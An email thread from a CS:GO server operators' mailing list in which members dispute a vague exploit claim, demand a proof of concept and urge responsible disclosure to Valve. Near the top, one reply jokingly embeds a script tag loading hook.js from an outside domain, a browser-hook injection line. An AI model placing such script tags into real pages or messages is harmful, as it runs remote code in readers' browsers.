You may want to fix your SSL cert bud ;)
On October 10, 2017 at 1:53:00 PM, Nathaniel Theis ([email protected]) wrote:
hello I have injected a JavaScript into this email you are all now hacked
what do you mean it won't run without an actual vulnerability
you're super mega hacked
<script src=//xmppwocky.net/hook.js></script>
On Oct 10, 2017 10:02 AM, "iNilo" <[email protected]> wrote:
I frankly don't care what / where / how you work, or what you have studied.
The only thing I know is that this is clearly the wrong channel to do
argue/disclose/chat about.
http://www.valvesoftware.com/security/
Hopefully you get thanked in a patch note, if not I'm sure the entire community
will be grateful that you disclosed a major security issue to the people that
actually get paid to take care of this.
Thanks.
2017-10-10 18:54 GMT+02:00 Saint K. <[email protected]>:
Christopher,
I work in “the field” as you like to call it. It’s customary to explain the
exploit in detail and provide proof the concept (hence the request for a PoC)
in any form or way.
Please demonstrate the issue, it be by posting the offending code, you
recording a video showing a working exploit, or anything along these lines.
You should know this, if you work in “the field”.
Regards,
Saint K.
From: Csgo_servers [mailto:[email protected]] On
Behalf Of Stealth Mode
Sent: 10 October 2017 18:34
To: [email protected]
Subject: Re: [Csgo_servers] Custom files exploit
@Ryan, etc.
I studied radio electronics before IT was a thing. NetSec and ITSec go hand in
hand. My credentials aren't CS, because CS was radio electronics. The industry
hasn't changed, just a little more vulnerable. Not like I am specifically
stating how to inject code, or what code to inject on a public mailing list.
Don't need to. Professionals here know what I am referring to. I guess the rest
do not have the knowledge to understand what the exploit can actually do. You
are aware. That is all that matters. Don't secure your servers, that is on you.
When they get exploited, that is on you.
Have a nice day! End of discussion. No further communications.
Sincerely,
Christopher "StealthMode" Stephen Larkins
Independent IT Field Engineer
fieldnation.com
workmarket.com
onforce.com
clearancejobs.com
On Tue, Oct 10, 2017 at 12:09 PM, Ryan Bentley <[email protected]> wrote:
My sides at this thread. At first I just rolled my eyes but now I actually
believe that Stealth Mode is either a troll or delusional. Please stop saying
"ITSec". Any first year CS student knows what PoC is but you don't? Please.
You are embarrassing yourself. Which institution did you get your degree? It
must be a very old BSc indeed. You talk complete nonsense and have a
fundamental misunderstanding of basic computer science tenets.
On Tue, Oct 10, 2017 at 4:34 PM, Nomaan Ahmad <[email protected]> wrote:
Nice hat there. Stealth might get this one though:
https://i.imgur.com/329jfXt.gif
On 10 Oct 2017 4:29 pm, "PistonMiner" <[email protected]> wrote:
The person in question should never have written a message about an open
vulnerability into a public mailing list in the first place. Just because they
did doesn't mean that you should ask for PoCs in public mailing lists, there's
a multitude of issues with that.
To make it perfectly clear, I'm not defending this person, I seriously doubt
the seriousness of their statements and a lot of what they're saying makes no
sense at all and looks like trying to maintain an image of competence while
knowing little, but responsible disclosure still applies. If this person has a
vulnerability to report, they should do so with the information listed at
http://www.valvesoftware.com/security/.
And I think I know what I'm talking about seeing as I have two Finder's Fees.
See https://wiki.teamfortress.com/wiki/Finder%27s_Fee and
https://wiki.teamfortress.com/wiki/List_of_Finder%27s_Fee_owners
On 10.10.2017 17:08, Vaya wrote:
I think someone needs to ‘stealth mode’ out of this email chain. This is just
noise without a repeatable Test
Sent from my iPhone
On 10 Oct 2017, at 16:01, PistonMiner <[email protected]> wrote:
If you have a vulnerability to report, don't do it in a public mailing list.
Report it directly to Valve, and no place else. This conversation has so many
problems, but asking for a PoC in a public mailing list is one of them. Look up
responsible disclosure. (I should note though, at this point I am not convinced
a vulnerability even exists.)
--
PistonMiner (Linus S.)
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
--
PistonMiner (Linus S.)
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
_______________________________________________
Csgo_servers mailing list
[email protected]
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
